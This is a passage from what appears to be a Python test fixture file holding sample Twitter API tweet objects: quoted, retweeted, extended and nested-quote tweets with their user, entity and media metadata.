"urls": [],
"media": [{
"expanded_url": "http://twitter.com/jlittman_dev/status/727894186415013888/photo/1",
"display_url": "pic.twitter.com/x6AYFg3REg",
"url": "https://t.co/x6AYFg3REg",
"media_url_https": "https://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg",
"id_str": "727894166961831936",
"sizes": {
"large": {
"h": 230,
"resize": "fit",
"w": 300
},
"small": {
"h": 230,
"resize": "fit",
"w": 300
},
"medium": {
"h": 230,
"resize": "fit",
"w": 300
},
"thumb": {
"h": 150,
"resize": "crop",
"w": 150
}
},
"indices": [32, 55],
"type": "photo",
"id": 727894166961831936,
"media_url": "http://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg"
}]
},
"in_reply_to_screen_name": None,
"in_reply_to_user_id": None,
"retweet_count": 0,
"id_str": "727894186415013888",
"favorited": False,
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": True,
"id": 2875189485,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"profile_text_color": "333333",
"profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 0,
"profile_sidebar_border_color": "C0DEED",
"id_str": "2875189485",
"profile_background_color": "C0DEED",
"listed_count": 0,
"is_translation_enabled": False,
"utc_offset": None,
"statuses_count": 9,
"description": "",
"friends_count": 0,
"location": "",
"profile_link_color": "0084B4",
"profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"following": False,
"geo_enabled": True,
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "jlittman_dev",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 0,
"name": "Justin Littman dev",
"notifications": False,
"url": None,
"created_at": "Thu Nov 13 15:49:55 +0000 2014",
"contributors_enabled": False,
"time_zone": None,
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": None,
"possibly_sensitive": False,
"lang": "en",
"created_at": "Wed May 04 16:14:32 +0000 2016",
"in_reply_to_status_id_str": None,
"place": None,
"extended_entities": {
"media": [{
"expanded_url": "http://twitter.com/jlittman_dev/status/727894186415013888/photo/1",
"display_url": "pic.twitter.com/x6AYFg3REg",
"url": "https://t.co/x6AYFg3REg",
"media_url_https": "https://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg",
"video_info": {
"aspect_ratio": [30, 23],
"variants": [{
"url": "https://pbs.twimg.com/tweet_video/Chn_42fWwAASuva.mp4",
"bitrate": 0,
"content_type": "video/mp4"
}]
},
"id_str": "727894166961831936",
"sizes": {
"large": {
"h": 230,
"resize": "fit",
"w": 300
},
"small": {
"h": 230,
"resize": "fit",
"w": 300
},
"medium": {
"h": 230,
"resize": "fit",
"w": 300
},
"thumb": {
"h": 150,
"resize": "crop",
"w": 150
}
},
"indices": [32, 55],
"type": "animated_gif",
"id": 727894166961831936,
"media_url": "http://pbs.twimg.com/tweet_video_thumb/Chn_42fWwAASuva.jpg"
}]
}
}
# tweet4 has a quoted_status
tweet4 = {
"contributors": None,
"truncated": False,
"text": "Test 10. Retweet. https://t.co/tBu6RRJoKr",
"is_quote_status": True,
"in_reply_to_status_id": None,
"id": 727930772691292161,
"favorite_count": 0,
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"quoted_status_id": 503873833213104128,
"retweeted": False,
"coordinates": None,
"quoted_status": {
"contributors": None,
"truncated": False,
"text": "First day at Gelman Library. First tweet. http://t.co/Gz5ybAD6os",
"is_quote_status": False,
"in_reply_to_status_id": None,
"id": 503873833213104128,
"favorite_count": 4,
"source": "<a href=\"http://twitter.com/download/android\" rel=\"nofollow\">Twitter for Android</a>",
"retweeted": False,
"coordinates": None,
"entities": {
"symbols": [],
"user_mentions": [],
"hashtags": [],
"urls": [],
"media": [{
"expanded_url": "http://twitter.com/justin_littman/status/503873833213104128/photo/1",
"display_url": "pic.twitter.com/Gz5ybAD6os",
"url": "http://t.co/Gz5ybAD6os",
"media_url_https": "https://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg",
"id_str": "503873819560665088",
"sizes": {
"large": {
"h": 576,
"resize": "fit",
"w": 1024
},
"small": {
"h": 191,
"resize": "fit",
"w": 340
},
"medium": {
"h": 338,
"resize": "fit",
"w": 600
},
"thumb": {
"h": 150,
"resize": "crop",
"w": 150
}
},
"indices": [42, 64],
"type": "photo",
"id": 503873819560665088,
"media_url": "http://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg"
}]
},
"in_reply_to_screen_name": None,
"in_reply_to_user_id": None,
"retweet_count": 0,
"id_str": "503873833213104128",
"favorited": False,
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": False,
"id": 481186914,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"profile_text_color": "333333",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 113,
"profile_sidebar_border_color": "C0DEED",
"id_str": "481186914",
"profile_background_color": "C0DEED",
"listed_count": 9,
"is_translation_enabled": False,
"utc_offset": -14400,
"statuses_count": 260,
"description": "",
"friends_count": 64,
"location": "",
"profile_link_color": "0084B4",
"profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"following": False,
"geo_enabled": True,
"profile_banner_url": "https://pbs.twimg.com/profile_banners/481186914/1460820528",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "justin_littman",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 117,
"name": "Justin Littman",
"notifications": False,
"url": None,
"created_at": "Thu Feb 02 12:19:18 +0000 2012",
"contributors_enabled": False,
"time_zone": "Eastern Time (US & Canada)",
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": None,
"possibly_sensitive": False,
"lang": "en",
"created_at": "Mon Aug 25 11:57:38 +0000 2014",
"in_reply_to_status_id_str": None,
"place": None,
"extended_entities": {
"media": [{
"expanded_url": "http://twitter.com/justin_littman/status/503873833213104128/photo/1",
"display_url": "pic.twitter.com/Gz5ybAD6os",
"url": "http://t.co/Gz5ybAD6os",
"media_url_https": "https://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg",
"id_str": "503873819560665088",
"sizes": {
"large": {
"h": 576,
"resize": "fit",
"w": 1024
},
"small": {
"h": 191,
"resize": "fit",
"w": 340
},
"medium": {
"h": 338,
"resize": "fit",
"w": 600
},
"thumb": {
"h": 150,
"resize": "crop",
"w": 150
}
},
"indices": [42, 64],
"type": "photo",
"id": 503873819560665088,
"media_url": "http://pbs.twimg.com/media/Bv4ekbqIYAAcmXY.jpg"
}]
}
},
"entities": {
"symbols": [],
"user_mentions": [],
"hashtags": [],
"urls": [{
"url": "https://t.co/tBu6RRJoKr",
"indices": [18, 41],
"expanded_url": "https://twitter.com/justin_littman/status/503873833213104128",
"display_url": "twitter.com/justin_littman\u2026"
},
{
"url": "https://t.co/6zD9PKIhKP",
"expanded_url": "http://bit.ly/1NoNeBF",
"display_url": "bit.ly/1NoNeBF",
"indices": [
41,
64
]
}
]
},
"in_reply_to_screen_name": None,
"in_reply_to_user_id": None,
"retweet_count": 0,
"id_str": "727930772691292161",
"favorited": False,
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": True,
"id": 2875189485,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"profile_text_color": "333333",
"profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 0,
"profile_sidebar_border_color": "C0DEED",
"id_str": "2875189485",
"profile_background_color": "C0DEED",
"listed_count": 0,
"is_translation_enabled": False,
"utc_offset": None,
"statuses_count": 10,
"description": "",
"friends_count": 0,
"location": "",
"profile_link_color": "0084B4",
"profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"following": False,
"geo_enabled": True,
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "jlittman_dev",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 0,
"name": "Justin Littman dev",
"notifications": False,
"url": None,
"created_at": "Thu Nov 13 15:49:55 +0000 2014",
"contributors_enabled": False,
"time_zone": None,
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": None,
"possibly_sensitive": False,
"lang": "en",
"created_at": "Wed May 04 18:39:55 +0000 2016",
"quoted_status_id_str": "503873833213104128",
"in_reply_to_status_id_str": None,
"place": None
}
# tweet5 has a retweet_status
tweet5 = {
"contributors": None,
"truncated": False,
"text": "RT @justin_littman: Ahh ... so in the context of web crawling, that's what a \"frontier\" means: https://t.co/6oDZe03LsV",
"is_quote_status": False,
"in_reply_to_status_id": None,
"id": 727933040803057667,
"favorite_count": 0,
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"retweeted": False,
"coordinates": None,
"entities": {
"symbols": [],
"user_mentions": [{
"id": 481186914,
"indices": [3, 18],
"id_str": "481186914",
"screen_name": "justin_littman",
"name": "Justin Littman"
}],
"hashtags": [],
"urls": [{
"url": "https://t.co/6oDZe03LsV",
"indices": [95, 118],
"expanded_url": "http://nlp.stanford.edu/IR-book/html/htmledition/the-url-frontier-1.html",
"display_url": "nlp.stanford.edu/IR-book/html/h\u2026"
}]
},
"in_reply_to_screen_name": None,
"in_reply_to_user_id": None,
"retweet_count": 2,
"id_str": "727933040803057667",
"favorited": False,
"retweeted_status": {
"contributors": None,
"truncated": False,
"text": "Ahh ... so in the context of web crawling, that's what a \"frontier\" means: https://t.co/6oDZe03LsV",
"is_quote_status": False,
"in_reply_to_status_id": None,
"id": 725271102444953601,
"favorite_count": 2,
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"retweeted": False,
"coordinates": None,
"entities": {
"symbols": [],
"user_mentions": [],
"hashtags": [],
"urls": [{
"url": "https://t.co/6oDZe03LsV",
"indices": [75, 98],
"expanded_url": "http://nlp.stanford.edu/IR-book/html/htmledition/the-url-frontier-1.html",
"display_url": "nlp.stanford.edu/IR-book/html/h\u2026"
}]
},
"in_reply_to_screen_name": None,
"in_reply_to_user_id": None,
"retweet_count": 2,
"id_str": "725271102444953601",
"favorited": False,
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": False,
"id": 481186914,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"profile_text_color": "333333",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 113,
"profile_sidebar_border_color": "C0DEED",
"id_str": "481186914",
"profile_background_color": "C0DEED",
"listed_count": 9,
"is_translation_enabled": False,
"utc_offset": -14400,
"statuses_count": 260,
"description": "",
"friends_count": 64,
"location": "",
"profile_link_color": "0084B4",
"profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"following": False,
"geo_enabled": True,
"profile_banner_url": "https://pbs.twimg.com/profile_banners/481186914/1460820528",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "justin_littman",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 117,
"name": "Justin Littman",
"notifications": False,
"url": None,
"created_at": "Thu Feb 02 12:19:18 +0000 2012",
"contributors_enabled": False,
"time_zone": "Eastern Time (US & Canada)",
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": None,
"possibly_sensitive": False,
"lang": "en",
"created_at": "Wed Apr 27 10:31:20 +0000 2016",
"in_reply_to_status_id_str": None,
"place": {
"full_name": "Centreville, VA",
"url": "https://api.twitter.com/1.1/geo/id/ffcc53c4a4e7a620.json",
"country": "United States",
"place_type": "city",
"bounding_box": {
"type": "Polygon",
"coordinates": [
[
[-77.479597, 38.802143],
[-77.397429, 38.802143],
[-77.397429, 38.880183],
[-77.479597, 38.880183]
]
]
},
"contained_within": [],
"country_code": "US",
"attributes": {},
"id": "ffcc53c4a4e7a620",
"name": "Centreville"
}
},
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": True,
"id": 2875189485,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"profile_text_color": "333333",
"profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 0,
"profile_sidebar_border_color": "C0DEED",
"id_str": "2875189485",
"profile_background_color": "C0DEED",
"listed_count": 0,
"is_translation_enabled": False,
"utc_offset": None,
"statuses_count": 11,
"description": "",
"friends_count": 0,
"location": "",
"profile_link_color": "0084B4",
"profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"following": False,
"geo_enabled": True,
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "jlittman_dev",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 0,
"name": "Justin Littman dev",
"notifications": False,
"url": None,
"created_at": "Thu Nov 13 15:49:55 +0000 2014",
"contributors_enabled": False,
"time_zone": None,
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": None,
"possibly_sensitive": False,
"lang": "en",
"created_at": "Wed May 04 18:48:55 +0000 2016",
"in_reply_to_status_id_str": None,
"place": None
}
# tweet6 has an extended tweet (Stream API)
tweet6 = {
"contributors": None,
"truncated": True,
"text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will… https://t.co/Hq4h61I3FX",
"is_quote_status": False,
"in_reply_to_status_id": 839526473534959600,
"id": 847804888365117400,
"favorite_count": 0,
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"retweeted": False,
"coordinates": None,
"timestamp_ms": "1490967411496",
"entities": {
"user_mentions": [
{
"id": 481186914,
"indices": [
0,
15
],
"id_str": "481186914",
"screen_name": "justin_littman",
"name": "Justin Littman"
}
],
"symbols": [],
"hashtags": [],
"urls": [
{
"url": "https://t.co/Hq4h61I3FX",
"indices": [
117,
140
],
"expanded_url": "https://twitter.com/i/web/status/847804888365117440",
"display_url": "twitter.com/i/web/status/8…"
}
]
},
"in_reply_to_screen_name": "justin_littman",
"id_str": "847804888365117440",
"display_text_range": [
16,
140
],
"retweet_count": 0,
"in_reply_to_user_id": 481186914,
"favorited": False,
"user": {
"follow_request_sent": None,
"profile_use_background_image": True,
"default_profile_image": True,
"id": 2875189485,
"verified": False,
"profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"followers_count": 0,
"profile_sidebar_border_color": "C0DEED",
"id_str": "2875189485",
"profile_background_color": "C0DEED",
"listed_count": 3,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"utc_offset": None,
"statuses_count": 21,
"description": None,
"friends_count": 0,
"location": None,
"profile_link_color": "1DA1F2",
"profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"following": None,
"geo_enabled": True,
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"name": "Justin Littman dev",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 0,
"screen_name": "jlittman_dev",
"notifications": None,
"url": None,
"created_at": "Thu Nov 13 15:49:55 +0000 2014",
"contributors_enabled": False,
"time_zone": None,
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": "481186914",
"possibly_sensitive": False,
"lang": "en",
"extended_tweet": {
"display_text_range": [
16,
156
],
"entities": {
"user_mentions": [
{
"id": 481186914,
"indices": [
0,
15
],
"id_str": "481186914",
"screen_name": "justin_littman",
"name": "Justin Littman"
}
],
"symbols": [],
"hashtags": [],
"urls": [
{
"url": "https://t.co/MfQy5wTWBc",
"indices": [
133,
156
],
"expanded_url": "https://gwu-libraries.github.io/sfm-ui/posts/2017-03-31-extended-tweets",
"display_url": "gwu-libraries.github.io/sfm-ui/posts/2…"
}
]
},
"full_text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will be available at: https://t.co/MfQy5wTWBc"
},
"created_at": "Fri Mar 31 13:36:51 +0000 2017",
"filter_level": "low",
"in_reply_to_status_id_str": "839526473534959617",
"place": None
}
# tweet 7 is an extended tweet from the REST API
tweet7 = {
"contributors": None,
"truncated": False,
"is_quote_status": False,
"in_reply_to_status_id": 839526473534959600,
"id": 847804888365117400,
"favorite_count": 0,
"full_text": "@justin_littman Some of the changes went live. This is going to be an example for a blog post I'm writing that will be available at: https://t.co/MfQy5wTWBc",
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"retweeted": False,
"coordinates": None,
"entities": {
"symbols": [],
"user_mentions": [
{
"id": 481186914,
"indices": [
0,
15
],
"id_str": "481186914",
"screen_name": "justin_littman",
"name": "Justin Littman"
}
],
"hashtags": [],
"urls": [
{
"url": "https://t.co/MfQy5wTWBc",
"indices": [
133,
156
],
"expanded_url": "https://gwu-libraries.github.io/sfm-ui/posts/2017-03-31-extended-tweets",
"display_url": "gwu-libraries.github.io/sfm-ui/posts/2…"
}
]
},
"in_reply_to_screen_name": "justin_littman",
"in_reply_to_user_id": 481186914,
"display_text_range": [
16,
156
],
"retweet_count": 0,
"id_str": "847804888365117440",
"favorited": False,
"user": {
"follow_request_sent": False,
"has_extended_profile": False,
"profile_use_background_image": True,
"default_profile_image": True,
"id": 2875189485,
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"verified": False,
"translator_type": "none",
"profile_text_color": "333333",
"profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"profile_sidebar_fill_color": "DDEEF6",
"entities": {
"description": {
"urls": []
}
},
"followers_count": 0,
"profile_sidebar_border_color": "C0DEED",
"id_str": "2875189485",
"profile_background_color": "C0DEED",
"listed_count": 3,
"is_translation_enabled": False,
"utc_offset": None,
"statuses_count": 21,
"description": "",
"friends_count": 0,
"location": "",
"profile_link_color": "1DA1F2",
"profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
"following": False,
"geo_enabled": True,
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"screen_name": "jlittman_dev",
"lang": "en",
"profile_background_tile": False,
"favourites_count": 0,
"name": "Justin Littman dev",
"notifications": False,
"url": None,
"created_at": "Thu Nov 13 15:49:55 +0000 2014",
"contributors_enabled": False,
"time_zone": None,
"protected": False,
"default_profile": True,
"is_translator": False
},
"geo": None,
"in_reply_to_user_id_str": "481186914",
"possibly_sensitive": False,
"lang": "en",
"created_at": "Fri Mar 31 13:36:51 +0000 2017",
"in_reply_to_status_id_str": "839526473534959617",
"place": None
}
# tweet 8 is a quote tweet nested in a retweet
tweet8 = {
"created_at": "Fri Oct 13 07:11:19 +0000 2017",
"id": 918735887264972800,
"id_str": "918735887264972800",
"full_text": "RT @ClimateCentral: Wildfire season in the American West is now two and a half months longer than it was 40 years ago. Our wildfire report…",
"truncated": False,
"display_text_range": [
0,
139
],
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [
{
"screen_name": "ClimateCentral",
"name": "Climate Central",
"id": 15463610,
"id_str": "15463610",
"indices": [
3,
18
]
}
],
"urls": []
},
"source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 1074184813,
"id_str": "1074184813",
"name": "DamonSmolderhalder😈",
"screen_name": "DElenaTimeless",
"location": "The Universe",
"description": "#Damon #TVD #Delena #IanSomerhalder #NikkiReed #SOMEREED #Baby 👶🏻 #BeautifulHumans ❤️#ISF 🐶🐱 #KatGraham #Riverdale #Yoga 🙏🏼",
"url": None,
"entities": {
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 1899,
"friends_count": 906,
"listed_count": 61,
"created_at": "Wed Jan 09 16:04:14 +0000 2013",
"favourites_count": 51301,
"utc_offset": None,
"time_zone": None,
"geo_enabled": True,
"verified": False,
"statuses_count": 39703,
"lang": "en",
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "642D8B",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme10/bg.gif",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme10/bg.gif",
"profile_background_tile": True,
"profile_image_url": "http://pbs.twimg.com/profile_images/600743044535554048/DBgKQQMF_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/600743044535554048/DBgKQQMF_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/1074184813/1461658232",
"profile_link_color": "FF0000",
"profile_sidebar_border_color": "65B0DA",
"profile_sidebar_fill_color": "7AC3EE",
"profile_text_color": "3D1957",
"profile_use_background_image": True,
"has_extended_profile": True,
"default_profile": False,
"default_profile_image": False,
"following": False,
"follow_request_sent": False,
"notifications": False,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"retweeted_status": {
"created_at": "Thu Oct 12 11:20:50 +0000 2017",
"id": 918436293247406100,
"id_str": "918436293247406080",
"full_text": "Wildfire season in the American West is now two and a half months longer than it was 40 years ago. Our wildfire report in @YEARSofLIVING ⬇️ https://t.co/nk49r9sS1a",
"truncated": False,
"display_text_range": [
0,
139
],
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [
{
"screen_name": "YEARSofLIVING",
"name": "YEARS",
"id": 308245641,
"id_str": "308245641",
"indices": [
122,
136
]
}
],
"urls": [
{
"url": "https://t.co/nk49r9sS1a",
"expanded_url": "https://twitter.com/yearsofliving/status/878622618886094848",
"display_url": "twitter.com/yearsofliving/…",
"indices": [
140,
163
]
}
]
},
"source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 15463610,
"id_str": "15463610",
"name": "Climate Central",
"screen_name": "ClimateCentral",
"location": "Princeton, NJ",
"description": "Researching and reporting the science and impacts of climate change 🌎",
"url": "https://t.co/sTxlhOkKr4",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/sTxlhOkKr4",
"expanded_url": "http://www.climatecentral.org",
"display_url": "climatecentral.org",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 77475,
"friends_count": 6206,
"listed_count": 3050,
"created_at": "Thu Jul 17 03:30:32 +0000 2008",
"favourites_count": 30341,
"utc_offset": -14400,
"time_zone": "Eastern Time (US & Canada)",
"geo_enabled": True,
"verified": True,
"statuses_count": 52858,
"lang": "en",
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "0A1241",
"profile_background_image_url": "http://pbs.twimg.com/profile_background_images/677240012/4a1aac3ffc674aa0a080bcb176825eeb.jpeg",
"profile_background_image_url_https": "https://pbs.twimg.com/profile_background_images/677240012/4a1aac3ffc674aa0a080bcb176825eeb.jpeg",
"profile_background_tile": True,
"profile_image_url": "http://pbs.twimg.com/profile_images/697146620543156225/R-VqX0vc_normal.png",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/697146620543156225/R-VqX0vc_normal.png",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/15463610/1503413844",
"profile_link_color": "0079C2",
"profile_sidebar_border_color": "000000",
"profile_sidebar_fill_color": "E46F0A",
"profile_text_color": "410936",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
"following": False,
"follow_request_sent": False,
"notifications": False,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": True,
"quoted_status_id": 878622618886094800,
"quoted_status_id_str": "878622618886094848",
"quoted_status": {
"created_at": "Sat Jun 24 14:35:31 +0000 2017",
"id": 878622618886094800,
"id_str": "878622618886094848",
"full_text": "Wildfire season in the American West is now two and a half months longer than it was 40 years ago.\n\n#YEARSproject #ClimateFacts https://t.co/AiA0mjoNXA",
"truncated": False,
"display_text_range": [
0,
127
],
"entities": {
"hashtags": [
{
"text": "YEARSproject",
"indices": [
100,
113
]
},
{
"text": "ClimateFacts",
"indices": [
114,
127
]
}
],
"symbols": [],
"user_mentions": [],
"urls": [],
"media": [
{
"id": 878622069532971000,
"id_str": "878622069532971008",
"indices": [
128,
151
],
"media_url": "http://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
"media_url_https": "https://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
"url": "https://t.co/AiA0mjoNXA",
"display_url": "pic.twitter.com/AiA0mjoNXA",
"expanded_url": "https://twitter.com/YEARSofLIVING/status/878622618886094848/video/1",
"type": "photo",
"sizes": {
"small": {
"w": 340,
"h": 340,
"resize": "fit"
},
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"medium": {
"w": 600,
"h": 600,
"resize": "fit"
},
"large": {
"w": 720,
"h": 720,
"resize": "fit"
}
}
}
]
},
"extended_entities": {
"media": [
{
"id": 878622069532971000,
"id_str": "878622069532971008",
"indices": [
128,
151
],
"media_url": "http://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
"media_url_https": "https://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
"url": "https://t.co/AiA0mjoNXA",
"display_url": "pic.twitter.com/AiA0mjoNXA",
"expanded_url": "https://twitter.com/YEARSofLIVING/status/878622618886094848/video/1",
"type": "video",
"sizes": {
"small": {
"w": 340,
"h": 340,
"resize": "fit"
},
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"medium": {
"w": 600,
"h": 600,
"resize": "fit"
},
"large": {
"w": 720,
"h": 720,
"resize": "fit"
}
},
"video_info": {
"aspect_ratio": [
1,
1
],
"duration_millis": 52667,
"variants": [
{
"content_type": "application/x-mpegURL",
"url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/pl/SSDau35aVr1jWK77.m3u8"
},
{
"bitrate": 1280000,
"content_type": "video/mp4",
"url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/720x720/Ev7hnJeFNOuwA-jt.mp4"
},
{
"bitrate": 832000,
"content_type": "video/mp4",
"url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/480x480/vxwV65LvvxvuqoE0.mp4"
},
{
"bitrate": 320000,
"content_type": "video/mp4",
"url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/240x240/R17LzSs4N5zqCTPG.mp4"
}
]
},
"additional_media_info": {
"monetizable": False
}
}
]
},
"source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 308245641,
"id_str": "308245641",
"name": "YEARS",
"screen_name": "YEARSofLIVING",
"location": "",
"description": "YEARS of LIVING DANGEROUSLY docu-series on climate change. WATCH on demand on NatGeo, GooglePlay, iTunes, Amazon & DVD #YEARSproject",
"url": "https://t.co/vKSslafi9r",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/vKSslafi9r",
"expanded_url": "http://yearsoflivingdangerously.com/",
"display_url": "yearsoflivingdangerously.com",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 25538,
"friends_count": 1087,
"listed_count": 659,
"created_at": "Tue May 31 02:29:26 +0000 2011",
"favourites_count": 4561,
"utc_offset": -14400,
"time_zone": "Eastern Time (US & Canada)",
"geo_enabled": False,
"verified": False,
"statuses_count": 17563,
"lang": "en",
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "131516",
"profile_background_image_url": "http://pbs.twimg.com/profile_background_images/439137896788811777/tmrk6A-m.jpeg",
"profile_background_image_url_https": "https://pbs.twimg.com/profile_background_images/439137896788811777/tmrk6A-m.jpeg",
"profile_background_tile": True,
"profile_image_url": "http://pbs.twimg.com/profile_images/787779443792019457/AffHFnwg_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/787779443792019457/AffHFnwg_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/308245641/1481820006",
"profile_link_color": "859160",
"profile_sidebar_border_color": "FFFFFF",
"profile_sidebar_fill_color": "EFEFEF",
"profile_text_color": "333333",
"profile_use_background_image": False,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
